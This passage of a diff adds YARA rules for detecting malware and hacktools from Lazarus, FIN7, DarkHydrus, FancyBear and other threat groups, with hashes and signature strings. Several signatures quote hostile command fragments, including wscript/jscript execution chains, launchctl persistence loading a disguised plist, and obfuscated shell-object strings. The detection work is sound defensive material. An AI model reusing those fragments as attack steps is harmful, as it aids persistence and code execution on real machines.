+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( ( 1 of ( $x* ) or 2 of them ) )
+}
+
+rule APT_Lazarus_Aug18_1_RID2DAC : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus Group Malware"
+      author = "Florian Roth"
+      reference = "https://securelist.com/operation-applejeus/87553/"
+      date = "2018-08-24 10:41:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ef400d73c6920ac811af401259e376458b498eb0084631386136747dfc3dcfa8"
+      hash2 = "1b8d3e69fc214cb7a08bef3c00124717f4b4d7fd6be65f2829e9fd337fc7c03c"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "mws2_32.dll" fullword wide
+      $s2 = "%s.bat" fullword wide
+      $s3 = "%s%s%s \"%s > %s 2>&1\"" fullword wide
+      $s4 = "Microsoft Corporation. All rights reserved." fullword wide
+      $s5 = "ping 127.0.0.1 -n 3" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3af996e4f960108533e69b9033503f40" or 4 of them )
+}
+
+rule APT_Lazarus_Aug18_2_RID2DAD : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus Group Malware"
+      author = "Florian Roth"
+      reference = "https://securelist.com/operation-applejeus/87553/"
+      date = "2018-08-24 10:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ae766795cda6336fd5cad9e89199ea2a1939a35e03eb0e54c503b1029d870c4"
+      hash2 = "d3ef262bae0beb5d35841d131b3f89a9b71a941a86dab1913bda72b935744d2e"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "vAdvapi32.dll" fullword wide
+      $s2 = "lws2_32.dll" fullword wide
+      $s3 = "%s %s > \"%s\" 2>&1" fullword wide
+      $s4 = "Not Service" fullword wide
+      $s5 = "ping 127.0.0.1 -n 3" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( 4 of them )
+}
+
+rule EXP_DriveCrypt_1_RID2CF9 : DEMO EXE EXPLOIT FILE {
+   meta:
+      description = "Detects DriveCrypt exploit"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-08-21 10:12:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0dd09bc97c768abb84d0fb6d1ae7d789f1f83bfb2ce93ff9ff3c538dc1effa33"
+      tags = "DEMO, EXE, EXPLOIT, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "x64passldr.exe" fullword ascii
+      $s2 = "DCR.sys" fullword ascii
+      $s3 = "amd64\\x64pass.sys" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+}
+
+rule MAL_Metasploit_Framework_UA_RID316E : DEMO EXE FILE MAL METASPLOIT SUSP {
+   meta:
+      description = "Detects User Agent used in Metasploit Framework"
+      author = "Florian Roth"
+      reference = "https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7"
+      date = "2018-08-16 13:22:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29"
+      tags = "DEMO, EXE, FILE, MAL, METASPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+}
+
+rule APT_HiddenCobra_GhostSecret_1_RID31E2 : APT DEMO EXE FILE G0032 NK {
+   meta:
+      description = "Detects Hidden Cobra Sample"
+      author = "Florian Roth"
+      reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+      date = "2018-08-11 13:41:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "05a567fe3f7c22a0ef78cc39dcf2d9ff283580c82bdbe880af9549e7014becfc"
+      tags = "APT, DEMO, EXE, FILE, G0032, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s\\%s.dll" fullword wide
+      $s2 = "PROXY_SVC_DLL.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule APT_HiddenCobra_GhostSecret_2_RID31E3 : APT DEMO EXE FILE G0032 NK {
+   meta:
+      description = "Detects Hidden Cobra Sample"
+      author = "Florian Roth"
+      reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+      date = "2018-08-11 13:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "45e68dce0f75353c448865b9abafbef5d4ed6492cd7058f65bf6aac182a9176a"
+      tags = "APT, DEMO, EXE, FILE, G0032, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ping 127.0.0.1 -n 3" fullword wide
+      $s2 = "Process32" fullword ascii
+      $s11 = "%2d%2d%2d%2d%2d%2d" fullword ascii
+      $s12 = "del /a \"" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule APT_FIN7_Strings_Aug18_1_RID2F27 : APT DEMO G0046 RUSSIA {
+   meta:
+      description = "Detects strings from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 11:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
+      tags = "APT, DEMO, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "&&call %a01%%a02% /e:jscript" ascii
+      $s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
+      $s3 = " w=wsc@ript /b " ascii
+      $s4 = "@echo %w:@=%|cmd" ascii
+      $s5 = " & wscript //b /e:jscript" 
+   condition: 
+      1 of them
+}
+
+rule APT_FIN7_Sample_Aug18_2_RID2EA0 : APT DEMO FILE G0046 MAL RUSSIA {
+   meta:
+      description = "Detects FIN7 malware sample"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 11:22:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
+      tags = "APT, DEMO, FILE, G0046, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
+      $x2 = "/*|*| *  Copyright 2016 Microsoft, Industries.|*| *  All rights reserved.|*|" ascii
+      $x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
+      $x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
+      $x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 2000KB and 1 of them
+}
+
+rule APT_FIN7_MalDoc_Aug18_1_RID2E6D : APT DEMO G0046 MAL RUSSIA {
+   meta:
+      description = "Detects malicious Doc from FIN7 campaign"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 11:14:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
+      tags = "APT, DEMO, G0046, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click  \"Enable editing\" from the yellow bar above" ascii
+   condition: 
+      filesize < 800KB and 1 of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_1_RID2FE0 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Manche Enterprises Limited0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_2_RID2FE1 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "constructor or from DllMain." fullword ascii
+      $s2 = "Network Software Ltd0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_3_RID2FE2 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
+      $s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_4_RID2FE3 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c:\\file.dat" fullword wide
+      $s2 = "constructor or from DllMain." fullword ascii
+      $s3 = "lineGetCallIDs" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and all of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_5_RID2FE4 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+      $s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_6_RID2FE5 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "coreServiceShell.exe" fullword ascii
+      $s2 = "PtSessionAgent.exe" fullword ascii
+      $s3 = "TiniMetI.exe" fullword ascii
+      $s4 = "PwmSvc.exe" fullword ascii
+      $s5 = "uiSeAgnt.exe" fullword ascii
+      $s7 = "LHOST:" fullword ascii
+      $s8 = "TRANSPORT:" fullword ascii
+      $s9 = "LPORT:" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and ( pe.exports ( "TiniStart" ) or 4 of them )
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_7_RID2FE6 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:16:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "libpng version" fullword ascii
+      $s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_8_RID2FE7 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:17:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetL3st3rr" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule APT_FIN7_EXE_Sample_Aug18_10_RID3010 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects sample from FIN7 report in August 2018"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:23:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+               00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
+               00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
+               00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+}
+
+rule APT_FIN7_Sample_EXE_Aug18_1_RID2FE0 : APT DEMO EXE FILE G0046 RUSSIA {
+   meta:
+      description = "Detects FIN7 Sample"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+      date = "2018-08-01 12:15:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
+      hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
+      hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
+      tags = "APT, DEMO, EXE, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+      $s2 = "dx=%d, dy=%d" fullword ascii
+      $s3 = "Error with JP2H box size" fullword ascii
+      $co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+               00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
+               00 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $s* ) and $co1 at 0x015D
+}
+
+rule APT_DarkHydrus_Jul18_1_RID2ED9 : APT DEMO EXE FILE G0079 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects strings found in malware samples in APT report in DarkHydrus"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+      date = "2018-07-28 11:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
+      tags = "APT, DEMO, EXE, FILE, G0079, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Z:\\devcenter\\aggressor\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "d3666d1cde4790b22b44ec35976687fb" or 1 of them )
+}
+
+rule APT_DarkHydrus_Jul18_2_RID2EDA : APT DEMO EXE FILE G0079 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects strings found in malware samples in APT report in DarkHydrus"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+      date = "2018-07-28 11:32:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
+      tags = "APT, DEMO, EXE, FILE, G0079, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "windir" fullword ascii
+      $s6 = "temp.dll" fullword ascii
+      $s7 = "libgcj-12.dll" fullword ascii
+      $s8 = "%s\\System32\\%s" fullword ascii
+      $s9 = "StartW" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them
+}
+
+rule APT_DarkHydrus_Jul18_3_RID2EDB : APT DEMO EXE FILE G0079 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects strings found in malware samples in APT report in DarkHydrus"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+      date = "2018-07-28 11:32:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
+      tags = "APT, DEMO, EXE, FILE, G0079, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s2 = "Ws2_32.dll" fullword ascii
+      $s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "478eacfbe2b201dabe63be53f34148a5" or all of them )
+}
+
+rule HKTL_Unlicensed_CobaltStrike_EICAR_Jul18_5_RID361D : APT COBALTSTRIKE DEMO EXE FILE G0079 HKTL MAL MIDDLE_EAST S0154 T1075 {
+   meta:
+      description = "Detects strings found in malware samples in APT report in DarkHydrus"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+      date = "2018-07-28 16:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-10-13"
+      hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
+      tags = "APT, COBALTSTRIKE, DEMO, EXE, FILE, G0079, HKTL, MAL, MIDDLE_EAST, S0154, T1075"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
+      $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+      $s2 = "libgcj-12.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or all of ( $s* ) or $x1 )
+}
+
+rule HKTL_beRootexe_output_RID2F60 : DEMO HKTL {
+   meta:
+      description = "Detects the output of beRoot.exe"
+      author = "Tobias Michalski"
+      reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
+      date = "2018-07-25 11:54:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "permissions: {'change_config'" fullword wide
+      $s2 = "Full path: C:\\Windows\\system32\\msiexec.exe /V" fullword wide
+      $s3 = "Full path: C:\\Windows\\system32\\svchost.exe -k DevicesFlow" fullword wide
+      $s4 = "! BANG BANG !" fullword wide
+   condition: 
+      filesize < 400KB and 3 of them
+}
+
+rule HKTL_EmbeddedPDF_RID2C87 : DEMO FILE HKTL MAL {
+   meta:
+      description = "Detects Embedded PDFs which can start malicious content"
+      author = "Tobias Michalski"
+      reference = "https://twitter.com/infosecn1nja/status/1021399595899731968?s=12"
+      date = "2018-07-25 09:53:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({" fullword ascii
+      $s1 = "(This PDF document embeds file" fullword ascii
+      $s2 = "/Names << /EmbeddedFiles << /Names" fullword ascii
+      $s3 = "/Type /EmbeddedFile" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5025 and 2 of ( $s* ) and $x1
+}
+
+rule MAL_OSX_FancyBear_Agent_Jul18_1_RID31DF : DEMO FILE G0007 MACOS MAL T1152 T1159 {
+   meta:
+      description = "Detects FancyBear Agent for OSX"
+      author = "Florian Roth"
+      reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
+      date = "2018-07-15 13:41:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
+      tags = "DEMO, FILE, G0007, MACOS, MAL, T1152, T1159"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/Users/kazak/Desktop/" ascii
+      $s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
+      $s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
+      $s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
+      $s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
+      $s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0xfacf and filesize < 3000KB and ( 1 of ( $x* ) and 4 of them )
+}
+
+rule APT_ME_BigBang_Gen_Jul18_1_RID2FCC : APT DEMO EXE FILE GEN MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from Big Bang campaign against Palestinian authorities"
+      author = "Florian Roth"
+      reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
+      date = "2018-07-09 12:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
+      hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
+      hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
+      $x3 = "S%@h%@e%l%@l." ascii
+      $x4 = "(\"S@%t@%a%@rt%@up\")" ascii
+      $x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii
+      $x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii
+      $x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii
+      $x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii
+      $x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii
+      $x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of them or pe.imphash ( ) == "0f09ea2a68d04f331df9a5d0f8641332" )
+}
+
+rule PUA_LNX_XMRIG_CryptoMiner_RID3009 : DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects XMRIG CryptoMiner software"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-06-28 12:22:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
